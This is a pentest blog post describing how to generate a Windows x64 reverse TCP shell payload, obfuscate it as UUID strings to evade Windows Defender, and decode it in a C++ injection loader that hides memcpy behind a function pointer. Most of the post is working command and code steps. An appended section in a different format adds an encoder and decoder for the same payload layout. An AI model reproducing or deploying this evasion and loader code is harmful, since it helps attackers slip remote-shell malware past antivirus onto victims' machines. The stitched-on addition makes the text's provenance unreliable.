{{tag>IT-Security Windows Kali pentest obfuscation blog english}}

===== Tools =====

The encoder is part of my shellcode tool [[https://github.com/psycore8/shencode|ShenCode]], which is available as open source.

===== Step 1: Prepare shellcode =====

==== generate ====

We create a payload without further encryption or encoding. A raw payload like this is usually recognised by Windows Defender.

<code bash>
python shencode.py create -c="-p windows/x64/shell/reverse_tcp LHOST=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw"
</code>

==== encode ====

We now encode this payload as UUID strings.

<code bash>
python shencode.py encode -f shell_rev.raw -u
</code>

The output now looks something like this:

<code cpp>
[*] try to open file
[+] reading 240906.001 successful!
[*] try to generate UUIDs
std::vector<std::string> sID = {
    "fce88f00-0000-6031-d264-8b523089e58b",
    "520c8b52-148b-7228-0fb7-4a2631ff31c0",
    "ac3c617c-022c-20c1-cf0d-01c74975ef52",
    "578b5210-8b42-3c01-d08b-407885c0744c",
    ...
    "c85fffd5-83f8-007d-2858-68004000006a",
    "0050680b-2f0f-30ff-d557-68756e4d61ff",
    "d55e5eff-0c24-0f85-70ff-ffffe99bffff",
    "ff01c329-c675-c1c3-bbf0-b5a2566a0053",
    "ffd5"
};
[+] DONE!
</code>

===== Step 2: Write Inject.cpp =====

==== Header ====

=== obfuscated shellcode ===

We create a new C++ project and adopt the obfuscated string array that we created previously. ''%%<algorithm>%%'' is required for ''%%std::remove%%'' and ''%%<cstdint>%%'' for ''%%uint8_t%%'', both of which are used further down.

<code cpp>
#include <stdio.h>
#include <windows.h>
#include <algorithm>   // std::remove
#include <cstdint>     // uint8_t
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
#include <iomanip>
#pragma warning

// obfuscated payload as generated by ShenCode
std::vector<std::string> sID = {
    "fce88f00-0000-6031-d264-8b523089e58b",
    "520c8b52-148b-7228-0fb7-4a2631ff31c0",
    "ac3c617c-022c-20c1-cf0d-01c74975ef52",
    "578b5210-8b42-3c01-d08b-407885c0744c",
    ...
    "c85fffd5-83f8-007d-2858-68004000006a",
    "0050680b-2f0f-30ff-d557-68756e4d61ff",
    "d55e5eff-0c24-0f85-70ff-ffffe99bffff",
    "ff01c329-c675-c1c3-bbf0-b5a2566a0053",
    "ffd5"
};
</code>

==== Encoding and injection ====

=== Remove superfluous characters ===

First we need a function that removes the ''-'' characters. It takes a string by reference and cleans it up in place.

<code cpp>
// strips every '-' from str (erase-remove idiom, needs <algorithm>)
void removeDashes(std::string& str) {
    str.erase(std::remove(str.begin(), str.end(), '-'), str.end());
}
</code>

=== Convert strings to bytes ===

The next function converts the UUID strings back into the payload bytes. The string array is processed entry by entry:

  * remove the ''-'' characters
  * read two hex characters at a time and append them as one byte
  * when the whole array has been processed, return the generated byte array to the caller

Note that this is a plain hex parse of each group in the order written, so the bytes come out exactly as ShenCode emitted them. It does not go through ''%%UuidFromStringA%%'', which would store the first three groups of each UUID byte-swapped in memory. The last entry (''%%"ffd5"%%'' above) is shorter than a full UUID; the length check inside the loop makes sure an odd trailing character is not read past the end of the string.

<code cpp>
// decodes the dashed hex strings into a byte vector
std::vector<uint8_t> convertToBytes(const std::vector<std::string>& inputStrings) {
    std::vector<uint8_t> byteArray;
    for (const auto& str : inputStrings) {
        std::string cleanStr = str;
        removeDashes(cleanStr);
        // two hex digits per byte
        for (size_t i = 0; i < cleanStr.length(); i += 2) {
            if (i + 1 < cleanStr.length()) {
                std::string byteString = cleanStr.substr(i, 2);
                uint8_t byte = static_cast<uint8_t>(std::stoi(byteString, nullptr, 16));
                byteArray.push_back(byte);
            }
        }
    }
    return byteArray;
}
</code>

=== Main programme ===

The main program initialises the variables, calls the conversion function, outputs the bytes to the console and then executes the injection. To disguise this process somewhat, the function ''%%memcpy%%'' is not called directly, but linked to our own function via a pointer.
<code cpp>
int main() {
    std::vector<std::string> input = sID;
    std::vector<uint8_t> result = convertToBytes(input);
    unsigned char* Payload = reinterpret_cast<unsigned char*>(result.data());
    size_t byteArrayLength = result.size();

    std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;

    // hex dump of the decoded payload, 8 bytes per line
    for (size_t i = 0; i < byteArrayLength; ++i) {
        std::cout << std::hex << std::setw(2) << std::setfill('0')
                  << static_cast<int>(Payload[i]) << " ";
        if ((i + 1) % 8 == 0) {
            std::cout << std::endl;
        }
    }
    std::cout << std::dec << std::endl;

    // The copy of Payload through a function pointer to memcpy and the
    // execution step described above follow here; they are cut off in
    // this copy of the post.
    return 0;
}
</code>
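As an added example that is neither code from the post nor from ShenCode: the round trip between raw bytes and the dashed UUID layout used above, with a decoder that rejects non-hex characters and odd digit counts instead of silently dropping data. The function names ''%%uuidEncode%%''/''%%uuidDecode%%'' are my own, the sample bytes are constructed (the sixteen bytes of the post's first UUID followed by ''%%ff d5%%''), and the code is portable C++11 without ''%%windows.h%%'', so it builds with g++ on Kali as well as with MSVC.

```cpp
// Added example, not part of the original post or of ShenCode: round trip
// between raw bytes and the dashed UUID layout used above. Portable C++11.
#include <algorithm>
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <string>
#include <vector>

// UUID text groups in hex digits: 8-4-4-4-12 = 32 digits = 16 bytes per string.
static const std::size_t kGroupLens[5] = {8, 4, 4, 4, 12};

// Bytes -> UUID-layout strings, 16 bytes per string. The last chunk may be
// shorter; it only gets a dash at each group boundary it actually reaches,
// which is why the post's output ends in a bare "ffd5".
std::vector<std::string> uuidEncode(const std::vector<uint8_t>& bytes) {
    static const char hexDigits[] = "0123456789abcdef";
    std::vector<std::string> out;
    for (std::size_t off = 0; off < bytes.size(); off += 16) {
        std::size_t end = std::min(off + 16, bytes.size());
        std::string hex;
        for (std::size_t i = off; i < end; ++i) {
            hex.push_back(hexDigits[bytes[i] >> 4]);
            hex.push_back(hexDigits[bytes[i] & 0x0f]);
        }
        std::string s;
        std::size_t pos = 0;
        for (std::size_t g = 0; g < 5 && pos < hex.size(); ++g) {
            if (g > 0) s.push_back('-');
            std::size_t take = std::min(kGroupLens[g], hex.size() - pos);
            s.append(hex, pos, take);
            pos += take;
        }
        out.push_back(s);
    }
    return out;
}

// UUID-layout strings -> bytes. Plain hex parse, group by group, in order;
// no byte swapping (UuidFromStringA would swap the first three groups).
// Rejects non-hex characters and odd digit counts instead of dropping data.
std::vector<uint8_t> uuidDecode(const std::vector<std::string>& strings) {
    std::vector<uint8_t> out;
    for (const std::string& s : strings) {
        std::string hex;
        for (char c : s) {
            if (c == '-') continue;
            if (!std::isxdigit(static_cast<unsigned char>(c)))
                throw std::invalid_argument("non-hex character in: " + s);
            hex.push_back(c);
        }
        if (hex.size() % 2 != 0)
            throw std::invalid_argument("odd number of hex digits in: " + s);
        for (std::size_t i = 0; i < hex.size(); i += 2)
            out.push_back(static_cast<uint8_t>(std::stoul(hex.substr(i, 2), nullptr, 16)));
    }
    return out;
}

// Constructed sample: the 16 bytes of the post's first UUID plus ff d5.
std::vector<uint8_t> sampleBytes() {
    return {0xfc, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x60, 0x31,
            0xd2, 0x64, 0x8b, 0x52, 0x30, 0x89, 0xe5, 0x8b,
            0xff, 0xd5};
}

// Encode the sample, decode it again and check the text matches the post's layout.
bool roundTripMatches() {
    std::vector<uint8_t> original = sampleBytes();
    std::vector<std::string> encoded = uuidEncode(original);
    return encoded.size() == 2
        && encoded[0] == "fce88f00-0000-6031-d264-8b523089e58b"
        && encoded[1] == "ffd5"
        && uuidDecode(encoded) == original;
}

// The strict decoder must refuse malformed input rather than emit garbage.
bool rejectsMalformed() {
    bool nonHex = false, oddLen = false;
    try { uuidDecode({"fce88f00-0000-6031-d264-8b523089e5zz"}); }
    catch (const std::invalid_argument&) { nonHex = true; }
    try { uuidDecode({"ffd"}); }
    catch (const std::invalid_argument&) { oddLen = true; }
    return nonHex && oddLen;
}

int main() {
    return (roundTripMatches() && rejectsMalformed()) ? 0 : 1;
}
```

The encoder is useful when you want to regenerate the array from a fresh payload without ShenCode at hand, and the strict decoder is what I would drop into ''%%Inject.cpp%%'' in place of ''%%convertToBytes%%'' if the strings are ever edited by hand: a typo then fails the build-time test instead of producing a payload that crashes one byte in.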